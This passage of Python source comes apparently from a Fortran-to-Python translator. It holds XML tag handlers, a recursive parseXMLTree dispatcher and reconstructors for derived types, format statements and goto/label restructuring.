or ("max_arg" in self.interface_xml[interface].attrib
and int(self.interface_xml[interface].attrib['max_arg']) < num_of_args)
):
self.interface_xml[interface].attrib['max_arg'] = str(num_of_args)
else:
pass
else:
pass
else:
assert False, f"Currently, {grandparent.tag} not handled for interface."
for child in root:
self.clean_attrib(child)
if child.tag == "argument":
# Collect the argument names with None as a initial type.
# Types will be updated in handle_tag_variable.
if grandparent.tag == "subroutine":
self.argument_types[grandparent.attrib['name']][child.attrib['name']] = None
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
# Set a default array status to False
cur_elem.attrib['is_array'] = "false"
else:
assert (
False
), f'In handle_tag_variable: "{child.tag}" not handled'
def handle_tag_argument(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
argument.
<argument>
</argument>
"""
current.attrib['is_array'] = "false"
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
def handle_tag_if(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the if elements.
<if>
</if>
"""
if traverse == 1:
current.attrib['if-before-goto'] = \
str(self.if_appear_before_goto).lower()
condition = None
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if traverse == 1:
# Check and hold conditional operation for <goto-stmt>
if child.tag == "header":
condition = child
elif child.tag == "body":
if "conditional-goto-stmt-lbl" in current.attrib:
if (
"type" not in child.attrib
or child.attrib['type'] != "else"
):
if (
condition is not None
and "code" in current.attrib
):
unique_code = current.attrib['code']
self.conditional_op[unique_code] = \
condition
else:
assert (
False
), f'In handle_tag_if: "{child.tag}" not handled'
else:
if child.tag == "if-stmt":
current.attrib.update(child.attrib)
elif child.tag == "body" and traverse > 1:
_ = ET.SubElement(current, child.tag, child.attrib)
else:
assert (
False
), f'In handle_tag_if: Empty elements "{child.tag}" ' \
f'not handled'
# If label appears before <goto>, mark <if>
# with goto-move to move it later (1st traverse)
if traverse == 1:
# Since label_after needs to be reconstructed first,
# we skip to collect the element if label_after is True
# Then, once the reconstruction of label_after is done,
# then we collect those reconstructed elements
if self.label_before and not self.label_after:
current.attrib['goto-move'] = "true"
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
if self.label_after:
if (
self.collect_stmts_after_goto
and "conditional-goto-stmt-lbl" not in current.attrib
and current.attrib['if-before-goto'] == "false"
):
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
elif self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
def handle_tag_stop(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the stop elements
<stop>
</stop>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "stop-code":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_stop: "{child.tag}" not handled'
def handle_tag_step(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the step elements.
<step>
</step>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "operation"
or child.tag == "literal"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_step: "{child.tag}" not handled'
else:
assert (
False
), f'In handle_tag_step: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_return(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the return and return-stmt elements.
However, since 'return-stmt' is an empty elements
with no sub-elements, the function will not keep
the elements, but move the attribute to its parent
elements, return.
<return>
</return>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "return-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_return: "{child.tag}" not handled'
def handle_tag_function(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the function elements.
<function>
</function>
"""
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "header":
self.is_function_arg = True
elif child.tag == "body":
self.current_body_scope = cur_elem
else:
assert (
False
), f'In handle_tag_function: "{child.tag}" not handled'
else:
if (
child.tag == "function-stmt"
or child.tag == "end-function-stmt"
or child.tag == "function-subprogram"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
False
), f'In handle_tag_function: Empty elements "{child.tag}"'
def handle_tag_use(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the use elements.
<use>
</use>
"""
assert (
isfile(self.module_log_file_path)
), f"Module log file path must exist."
with open(self.module_log_file_path) as json_f:
module_logs = json.load(json_f)
file_to_mod_mapper = module_logs["file_to_mod"]
mod_to_file_mapper = module_logs["mod_to_file"]
self.module_summary = module_logs["mod_info"]
use_module = root.attrib['name']
self.used_modules.append(use_module.lower())
if use_module.lower() in mod_to_file_mapper:
use_module_file_path = mod_to_file_mapper[use_module.lower()]
if (
use_module_file_path[0] !=
self.original_fortran_file_abs_path
and use_module not in self.modules_in_file
):
self.module_files_to_process.append(use_module_file_path[0])
else:
# If module resides in the same file, we don't have to do
# anything. Handling for this case is already implemented in
# genPGM.py
pass
else:
pass
for child in root:
self.clean_attrib(child)
if child.tag == "use-stmt" or child.tag == "only":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_use: "{child.tag}" not handled'
def handle_tag_module(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the module elements.
<module>
</module>
"""
for child in root:
self.clean_attrib(child)
try:
_ = self.module_child_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_module: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
self.modules_in_file.append(root.attrib["name"])
def handle_tag_initial_value(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the initial-value elements.
<initial-value>
</initial-value>
"""
for child in root:
self.clean_attrib(child)
if child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "literal" or child.tag == "operation":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_initial_value: "{child.tag}" not handled'
else:
if child.tag == "initialization":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_initial_value: Empty elements ' \
f'"{child.tag}"'
def handle_tag_members(
self, root, current, parent, grandparnet, traverse
):
"""This function handles cleaning up the XML elements
between the members elements.
<members> or <member>
</members> </member>
"""
self.is_interface_member = True
for child in root:
self.clean_attrib(child)
try:
error_chk = self.members_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_members: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# Re-initialize to false when exiting members
self.is_interface_member = False
def handle_tag_only(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the only elements.
<only>
</only>
"""
for child in root:
try:
error_chk = self.only_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_only: "{child.tag}" not handled'
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
def handle_tag_length(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the length elements.
<length>
</length>
"""
for child in root:
if child.tag in ["literal", "char-length", "type-param-value"]:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_length: "{child.tag}" not handled'
def handle_tag_interface(
self, root, current, parent, grandparent, traverse
):
"""This function handles rectifying the elements between
interface tag.
<interface>
</interface>
"""
self.is_interface = True
for child in root:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_length: "{child.tag}" not handled'
self.interface_xml[self.cur_interface_name] = current
# Re-initializing for next interface use
self.cur_interface_name = None
self.is_interface = False
def handle_tag_select(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the select elements.
<select>
</select>
"""
for child in root:
self.clean_attrib(child)
if child.tag in self.select_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_length: "{child.tag}" not handled'
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_select: Empty elements "{child.tag}"'
def handle_tag_case(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the case elements.
<case>
</case>
"""
for child in root:
self.clean_attrib(child)
if child.tag in self.case_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_case: Empty elements "{child.tag}"'
def handle_tag_value_ranges(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the value-ranges elements.
<value-ranges>
</value-ranges>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "value-range":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_value_ranges: Empty eleme' \
f'nts "{child.tag}"'
def handle_tag_value_range(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the value-range elements.
<value-range>
</value-range>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "value":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
current.remove(cur_elem)
if len(root) == 1:
parent.remove(current)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_value_range: Empty elements ' \
f'"{child.tag}"'
def handle_tag_values(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the values elements.
<values>
</values>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "literal":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_values: Empty elements "{child.tag}"'
# For DATA statements, further indentation might be required
target_child = None
delete_child = []
for child in current:
if len(child) == 0:
target_child = child
else:
cur_elem = ET.SubElement(
target_child, child.tag, child.attrib
)
delete_child.append(child)
for child in delete_child:
current.remove(child)
#################################################################
# #
# XML TAG PARSER #
# #
#################################################################
def parseXMLTree(
self, root, current, parent, grandparent, traverse
):
"""Recursively traverse through the nested XML AST tree and
calls appropriate tag handler, which will generate
a cleaned version of XML tree for translate.py.
Any new tags handlers must be added under this this function.
parseXMLTree
Arguments:
root: The current root of the tree.
current: Current element.
parent: Parent element of the current.
grandparent: A parent of parent statement of current.
traverse: Keeps the track of number of traverse time.
Returns:
None
"""
if root.tag == "file":
self.handle_tag_file(root, current, parent, grandparent, traverse)
elif root.tag == "program":
self.handle_tag_program(root, current, parent, grandparent,
traverse)
elif root.tag == "header":
self.handle_tag_header(root, current, parent, grandparent, traverse)
elif root.tag == "specification":
self.handle_tag_specification(root, current, parent, grandparent,
traverse)
elif root.tag == "body":
self.handle_tag_body(root, current, parent, grandparent, traverse)
elif root.tag == "declaration":
self.handle_tag_declaration(root, current, parent, grandparent,
traverse)
elif root.tag == "type":
self.handle_tag_type(root, current, parent, grandparent, traverse)
elif root.tag == "variables":
self.handle_tag_variables(root, current, parent, grandparent,
traverse)
elif root.tag == "variable":
self.handle_tag_variable(root, current, parent, grandparent,
traverse)
elif root.tag == "statement":
self.handle_tag_statement(root, current, parent, grandparent,
traverse)
elif root.tag == "assignment":
self.handle_tag_assignment(root, current, parent, grandparent,
traverse)
elif root.tag == "target":
self.handle_tag_target(root, current, parent, grandparent, traverse)
elif root.tag == "value":
self.handle_tag_value(root, current, parent, grandparent, traverse)
elif root.tag == "names":
self.handle_tag_names(root, current, parent, grandparent, traverse)
elif root.tag == "name":
self.handle_tag_name(root, current, parent, grandparent, traverse)
elif root.tag == "literal":
self.handle_tag_literal(root, current, parent, grandparent,
traverse)
elif root.tag == "dimensions":
self.handle_tag_dimensions(root, current, parent, grandparent,
traverse)
elif root.tag == "dimension":
self.handle_tag_dimension(root, current, parent, grandparent,
traverse)
elif root.tag == "loop":
self.handle_tag_loop(root, current, parent, grandparent, traverse)
elif root.tag == "index-variable" or root.tag == "range":
self.handle_tag_index_variable_or_range(root, current, parent,
grandparent, traverse)
elif root.tag == "lower-bound" or root.tag == "upper-bound":
self.handle_tag_bound(root, current, parent, grandparent, traverse)
elif root.tag == "subscripts":
self.handle_tag_subscripts(root, current, parent, grandparent,
traverse)
elif root.tag == "subscript":
self.handle_tag_subscript(root, current, parent, grandparent,
traverse)
elif root.tag == "operation":
self.handle_tag_operation(root, current, parent, grandparent,
traverse)
elif root.tag == "operand":
self.handle_tag_operand(root, current, parent, grandparent,
traverse)
elif root.tag == "write":
self.handle_tag_write(root, current, parent, grandparent, traverse)
elif root.tag == "io-controls":
self.handle_tag_io_controls(root, current, parent, grandparent,
traverse)
elif root.tag == "io-control":
self.handle_tag_io_control(root, current, parent, grandparent,
traverse)
elif root.tag == "outputs":
self.handle_tag_outputs(root, current, parent, grandparent,
traverse)
elif root.tag == "output":
self.handle_tag_output(root, current, parent, grandparent, traverse)
elif root.tag == "format":
self.handle_tag_format(root, current, parent, grandparent, traverse)
elif root.tag == "format-items" or root.tag == "format-item":
self.handle_tag_format_items(root, current, parent, grandparent,
traverse)
elif root.tag == "print":
self.handle_tag_print(root, current, parent, grandparent, traverse)
elif root.tag == "open":
self.handle_tag_open(root, current, parent, grandparent, traverse)
elif root.tag == "keyword-arguments" or root.tag == "keyword-argument":
self.handle_tag_keyword_arguments(root, current, parent,
grandparent, traverse)
elif root.tag == "read":
self.handle_tag_read(root, current, parent, grandparent, traverse)
elif root.tag == "inputs" or root.tag == "input":
self.handle_tag_inputs(root, current, parent, grandparent, traverse)
elif root.tag == "close":
self.handle_tag_close(root, current, parent, grandparent, traverse)
elif root.tag == "call":
self.handle_tag_call(root, current, parent, grandparent, traverse)
elif root.tag == "subroutine":
self.handle_tag_subroutine(root, current, parent, grandparent,
traverse)
elif root.tag == "arguments":
self.handle_tag_arguments(root, current, parent, grandparent,
traverse)
elif root.tag == "if":
self.handle_tag_if(root, current, parent, grandparent, traverse)
elif root.tag == "stop":
self.handle_tag_stop(root, current, parent, grandparent, traverse)
elif root.tag == "step":
self.handle_tag_step(root, current, parent, grandparent, traverse)
elif root.tag == "return":
self.handle_tag_return(root, current, parent, grandparent, traverse)
elif root.tag == "function":
self.handle_tag_function(root, current, parent, grandparent,
traverse)
elif root.tag == "use":
self.handle_tag_use(root, current, parent, grandparent, traverse)
elif root.tag == "module":
self.handle_tag_module(root, current, parent, grandparent, traverse)
elif root.tag == "initial-value":
self.handle_tag_initial_value(root, current, parent, grandparent,
traverse)
elif root.tag == "members":
self.handle_tag_members(root, current, parent, grandparent,
traverse)
elif root.tag == "only":
self.handle_tag_only(root, current, parent, grandparent, traverse)
elif root.tag == "length":
self.handle_tag_length(root, current, parent, grandparent, traverse)
elif root.tag == "saved-entity":
self.handle_tag_saved_entity(root, current, parent, grandparent,
traverse)
elif root.tag == "save-stmt":
self.handle_tag_save_statement(root, current, parent, grandparent,
traverse)
elif root.tag == "constants":
self.handle_tag_constants(root, current, parent, grandparent,
traverse)
elif root.tag == "constant":
self.handle_tag_constant(root, current, parent, grandparent,
traverse)
elif root.tag == "argument":
self.handle_tag_argument(root, current, parent, grandparent,
traverse)
elif root.tag == "interface":
self.handle_tag_interface(root, current, parent, grandparent,
traverse)
elif root.tag == "select":
self.handle_tag_select(root, current, parent, grandparent,
traverse)
elif root.tag == "case":
self.handle_tag_case(root, current, parent, grandparent,
traverse)
elif root.tag == "value-ranges":
self.handle_tag_value_ranges(root, current, parent, grandparent,
traverse)
elif root.tag == "value-range":
self.handle_tag_value_range(root, current, parent, grandparent,
traverse)
elif root.tag == "values":
self.handle_tag_values(root, current, parent, grandparent, traverse)
else:
assert (
False
), f"In parseXMLTree: <{root.tag}> passed from <{parent.tag}> " \
f"not supported"
#################################################################
# #
# RECONSTRUCTORS #
# #
#################################################################
def reconstruct_derived_type_declaration(self):
"""This function reconstructs the derived type
with the collected derived type declaration
elements in the handle_tag_declaration and
handle_tag_type.
Args:
None.
Returns:
None.
"""
if self.derived_type_var_holder_list:
size = ET.Element("")
is_dimension = False
# Since component-decl-list appears after component-decl,
# the program needs to iterate the list once first to
# pre-collect the variable counts.
counts = []
for elem in self.derived_type_var_holder_list:
if elem.tag == "component-decl-list":
counts.append(elem.attrib['count'])
# Initialize count to 0 for <variables> count attribute.
count = 0
dim = 0
# 'component-decl-list__begin' tag is an indication
# of all the derived type member variable
# declarations will follow.
derived_type = ET.SubElement(self.parent_type, "derived-types")
literal_value = None
str_value = None
for elem in self.derived_type_var_holder_list:
if elem.tag == "intrinsic-type-spec":
keyword2 = ""
if elem.attrib['keyword2'] == "":
keyword2 = "none"
else:
keyword2 = elem.attrib['keyword2']
attributes = {
"hasKind": "false",
"hasLength": "false",
"name": elem.attrib['keyword1'],
"is_derived_type": str(self.is_derived_type),
"keyword2": keyword2,
}
newType = ET.SubElement(derived_type, "type", attributes)
if newType.attrib['name'].lower() == "character":
assert (
literal_value != None
), "Literal value (String length) for character cannot be None."
newType.set("string_length", literal_value)
literal_value = None # Reset literal_value to None
elif elem.tag == "derived-type-spec":
attributes = {
"hasKind": "false",
"hasLength": "false",
"name": elem.attrib['typeName'],
"is_derived_type": str(self.is_derived_type),
"keyword2": "none",
}
newType = ET.SubElement(derived_type, "type", attributes)
elif (
elem.tag == "literal"
or elem.tag == "name"
):
value = elem
if elem.tag == "literal":
tag_name = "literal"
literal_value = elem.attrib['value']
else:
tag_name = "name"
elif elem.tag == "component-array-spec":
is_dimension = True
dim += 1
elif (
elem.tag == "component-decl-list__begin"
and not is_dimension
):
if len(counts) > count:
attr = {"count": counts[count]}
new_variables = ET.SubElement(
derived_type, "variables", attr
) # <variables _attribs_>
count += 1
elif elem.tag == "operation":
str_value = ""
for op in elem.iter():
if op.tag == "char-literal-constant":
str_value += op.attrib['str']
str_value = str_value.replace('"','')
elif elem.tag == "component-decl":
if not is_dimension:
var_attribs = {
"has_initial_value": elem.attrib[
"hasComponentInitialization"
],
"name": elem.attrib['id'],
"is_array": "false",
}
# Store variable name in the non array tracker
self.declared_non_array_vars.update(
{elem.attrib['id']: self.current_scope}
)
new_variable = ET.SubElement(
new_variables, "variable", var_attribs
) # <variable _attribs_>
if elem.attrib['hasComponentInitialization'] == "true":
init_value_attrib = ET.SubElement(
new_variable, "initial-value"
)
if str_value:
value.attrib['value'] = str_value
str_value = None
new_size = ET.SubElement(
init_value_attrib, tag_name, value.attrib
) # <initial-value _attribs_>
else:
total_number_of_arrays = len(self.derived_type_array_dimensions)
new_dimensions = ET.SubElement(
derived_type, "dimensions", {"count": "1"}
) # <dimensions count="1">
if self.derived_type_array_dimensions[dim]:
new_dimension = ET.SubElement(
new_dimensions, "dimension", {"type": "simple"}
) # <dimension type="simple">
has_lower_bound = False
new_range = ET.SubElement(new_dimension, "range")
num_of_dimensions = len(self.derived_type_array_dimensions[dim])
for s in range(0, num_of_dimensions):
value = self.derived_type_array_dimensions[dim][s]
if value.tag == "literal":
tag_name = "literal"
elif value.tag == "name":
tag_name = "name"
value.attrib["is_derived_type_ref"] = "true"
else:
pass
need_new_dimension = False
need_upper_bound = False
if (
len(self.derived_type_array_dimensions[dim]) == 1
or (not has_lower_bound
and ((s+1) < len(self.derived_type_array_dimensions[dim])
and value.attrib["dim-number"] != self.derived_type_array_dimensions[dim][s+1].attrib["dim-number"]))
):
if (
(s+1) < len(self.derived_type_array_dimensions[dim])
and value.attrib["dim-number"] != self.derived_type_array_dimensions[dim][s+1].attrib["dim-number"]
):
need_new_dimension = True
upper_bound_value = copy.copy(value)
upper_bound_tag_name = tag_name
tag_name = "literal"
value.tag = "literal"
value.attrib = {
"dim-number": value.attrib["dim-number"],
"type": "int",
"value": "0"
}
need_upper_bound = True
if not has_lower_bound:
bound = ET.SubElement(new_range, "lower-bound")
has_lower_bound = True
else:
bound = ET.SubElement(new_range, "upper-bound")
has_lower_bound = False
new_range_value = ET.SubElement(bound, tag_name, value.attrib)
if need_upper_bound:
bound = ET.SubElement(new_range, "upper-bound")
new_range_value = ET.SubElement(bound, upper_bound_tag_name, upper_bound_value.attrib)
has_lower_bound = False
if need_new_dimension:
new_dimension = ET.SubElement(
new_dimensions, "dimension", {"type": "simple"}
) # <dimension type="simple">
new_range = ET.SubElement(new_dimension, "range")
need_new_dimension = False
if len(counts) > count:
attr = {"count": counts[count]}
new_variables = ET.SubElement(
derived_type, "variables", attr
)
count += 1
var_attribs = {
"has_initial_value": elem.attrib[
"hasComponentInitialization"
],
"name": elem.attrib['id'],
"is_array": "true",
}
# Store variable name in the array tracker
self.declared_array_vars.update(
{elem.attrib['id']: self.current_scope}
)
new_variable = ET.SubElement(
new_variables, "variable", var_attribs
)
is_dimension = False
# Once one derived type was successfully constructed,
# clear all the elements of a derived type list
self.derived_type_var_holder_list.clear()
def reconstruct_derived_type_ref(self, current):
"""This function reconstruct the id into x.y.k form
from the messy looking id. One thing to notice is
that this new form was generated in the python syntax,
so it is a pre-process for translate.py and
even pyTranslate.py that
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
assert (
current.tag == "name"
), f"The tag <name> must be passed to reconstruct_derived_type_ref.\
Currently, it's {current.tag}."
# First the root <name> id gets the very first
# variable reference i.e. x in x.y.k (or x%y%k in Fortran syntax)
current.attrib['id'] = self.derived_type_var_holder_list[0]
if (
current.attrib['id'] in self.declared_array_vars
and self.declared_array_vars[current.attrib['id']]
== self.current_scope
):
current.attrib['hasSubscripts'] = "true"
current.attrib['is_array'] = "true"
else:
current.attrib['hasSubscripts'] = "false"
current.attrib['is_array'] = "false"
number_of_vars = len(self.derived_type_var_holder_list)
attributes = {}
parent_ref = current
self.derived_type_refs.append(parent_ref)
for var in range(1, number_of_vars):
variable_name = self.derived_type_var_holder_list[var]
attributes.update(current.attrib)
attributes['id'] = variable_name
if (
variable_name in self.declared_array_vars
and self.declared_array_vars[variable_name]
== self.current_scope
):
attributes['hasSubscripts'] = "true"
attributes['is_array'] = "true"
else:
attributes['is_array'] = "false"
# Create N (number_of_vars) number of new subElement
# under the root <name> for each referencing variable
reference_var = ET.SubElement(
parent_ref, "name", attributes
)
parent_ref = reference_var
self.derived_type_refs.append(parent_ref)
self.derived_type_var_holder_list.clear() # Clean up the list for re-use
def reconstruct_format(self, grandparent, traverse):
"""This function is for reconstructing the <format>
under the <statement> element.
The OFP XML nests formats under:
(1) statement
(2) declaration
(3) loop
tags, which are wrong except one that is declared
under the statement. Therefore, those formats
declared under (2) and (3) will be extracted
and reconstructed to be nested under (1)
in this function.
Args:
grandparent (:obj: 'ET'): Grand parent element object.
traverse (int): Current traverse number.
Returns:
None.
"""
root_scope = ET.SubElement(self.current_body_scope, "statement")
for form in self.format_holder:
cur_elem = ET.SubElement(root_scope, form.tag, form.attrib)
self.parseXMLTree(
form, cur_elem, root_scope, grandparent, traverse
)
def reconstruct_derived_type_names(self, current):
"""This function reconstructs derived type
reference syntax tree. However, this functions is
actually a preprocessor for the real final reconstruction.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
# Update reconstruced derived type references
assert (
self.is_derived_type_ref == True
), "'self.is_derived_type_ref' must be true"
numPartRef = int(current.attrib['numPartRef'])
for idx in range(1, len(self.derived_type_refs)):
self.derived_type_refs[idx].attrib.update(
{"numPartRef": str(numPartRef)}
)
# Re-initialize to original values
self.derived_type_refs.clear()
def reconstruct_name_element(self, cur_elem, current):
"""This function performs a final reconstruction of
derived type name element that was preprocessed by
'reconstruct_derived_type_names' function.
This function traverses the preprocessed name element
(including sub-elements) and split & store <name> and
<subscripts> into separate lists. Then, it comibines
and reconstructs two lists appropriately.
Args:
cur_elem (:obj: 'ET'): Newly generated element
for current element object.
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
name_elements = [cur_elem]
# Remove the original <name> elements.
current.remove(cur_elem)
# Split & Store <name> element and <subscripts>.
subscripts_holder = []
for child in cur_elem:
if child.tag == "subscripts":
subscripts_holder.append(child)
else:
name_elements.append(child)
for third in child:
name_elements.append(third)
# Combine & Reconstruct <name> element.
subscript_num = 0
cur_elem = ET.SubElement(
current, name_elements[0].tag, name_elements[0].attrib
)
cur_elem.attrib['is_derived_type_ref'] = "true"
if cur_elem.attrib['hasSubscripts'] == "true":
cur_elem.append(subscripts_holder[subscript_num])
subscript_num += 1
numPartRef = int(cur_elem.attrib['numPartRef']) - 1
name_element = ET.Element("")
for idx in range(1, len(name_elements)):
name_elements[idx].attrib['numPartRef'] = str(numPartRef)
numPartRef -= 1
name_element = ET.SubElement(
cur_elem, name_elements[idx].tag, name_elements[idx].attrib
)
name_element.attrib['is_derived_type_ref'] = "true"
# In order to handle the nested subelements of <name>,
# update the cur_elem at each iteration.
cur_elem = name_element
if name_elements[idx].attrib['hasSubscripts'] == "true":
name_element.append(subscripts_holder[subscript_num])
subscript_num += 1
# Clean out the lists for recyling.
# This is not really needed as they are local lists,
# but just in case.
name_elements.clear()
subscripts_holder.clear()
self.need_reconstruct = False
def reconstruct_goto_after_label(
self, parent, traverse, reconstruct_target
):
"""This function gets called when goto appears
after the corresponding label and all necessary
statements are collected for the reconstruction.
Args:
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
header (list): A header tht holds conditional header.
traverse (int): A traverse counter.
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
Return:
None.
"""
number_of_gotos = reconstruct_target['count-gotos']
stmts_follow_goto = reconstruct_target['stmts-follow-goto']
stmts_follow_label = reconstruct_target['stmts-follow-label']
header = [None]
self.check_conditional_goto(header, stmts_follow_goto)
# Corrent boundaries of gotos in case of a multiple
# nested gotos.
self.goto_boundary_corrector(
reconstruct_target, stmts_follow_goto,
stmts_follow_label
)
# Check for the case where goto and label are
# at different lexical levels
self.handle_in_outward_movement(stmts_follow_goto, stmts_follow_label, parent)
if not self.conditional_goto:
declared_goto_flag_num = []
self.generate_declaration_element(
parent, "goto_flag", number_of_gotos,
declared_goto_flag_num, traverse
)
# This variable is for storing goto that may appear
# at the end of if because we want to extract one
# scope out and place it right after
# the constructed if-statement
next_goto = []
reconstructed_goto_elem = []
for i in range(number_of_gotos):
# Constructor for statements if and statements nested
self.reconstruct_stmts_follow_goto_after_case(
header, parent, stmts_follow_goto, next_goto,
traverse, reconstructed_goto_elem, i
)
# Constructor for statements with L_i:stmt_n
self.reconstruct_stmts_follow_label_after_case(
stmts_follow_label, next_goto, reconstructed_goto_elem,
header, traverse, parent, i
)
# When unconditional goto, it generates 'goto_flag_i = False'
# statement at the end of reconstrcted goto statement.
# Else, nothing gets printed, but set self.conditional_goto to False
if not self.conditional_goto:
statement = ET.SubElement(parent, "statement")
self.generate_assignment_element(statement, \
f"goto_flag_{i+1}", None, "literal", "false", traverse)
reconstructed_goto_elem.append(statement)
parent.remove(statement)
else:
self.conditional_goto = False
if len(reconstructed_goto_elem) > 1:
stmts_follow_label = reconstructed_goto_elem[1]
self.encapsulate_under_do_while = False
# next_goto holds another goto after the current label_after
# case label, which will encapsulate reconstrcted goto element
if next_goto:
self.reconstruct_next_goto(next_goto, reconstructed_goto_elem, parent)
# Set all holders and checkers (markers) to default
self.label_after = False
self.goto_under_if = False
self.reconstruct_after_case_now = False
self.reconstruction_for_after_done = True
self.goto_target_lbl_after.clear()
self.label_lbl_for_after.clear()
self.statements_to_reconstruct_after.clear()
def reconstruct_goto_before_label(
self, parent, traverse, reconstruct_target
):
"""This function gets called when goto appears
before the corresponding label and all necessary
statements are collected for the reconstruction.
Args:
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
traverse (int): A traverse counter.
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
Return:
None.
"""
stmts_follow_label = reconstruct_target['stmts-follow-label']
number_of_gotos = reconstruct_target['count-gotos']
# This removes the statement that's a child statement of
# if body being seprately re-added to the list.
self.remove_dup_stmt(stmts_follow_label)
# Declare label flag for loop condition
declared_label_flag_num = []
self.generate_declaration_element(
parent, "label_flag", number_of_gotos,
declared_label_flag_num, traverse
)
# Find the boundary from label to goto.
# Remove any statements that are not within the boundary.
goto_index_holder = []
target_label_lbl = [None]
statements_to_recover =\
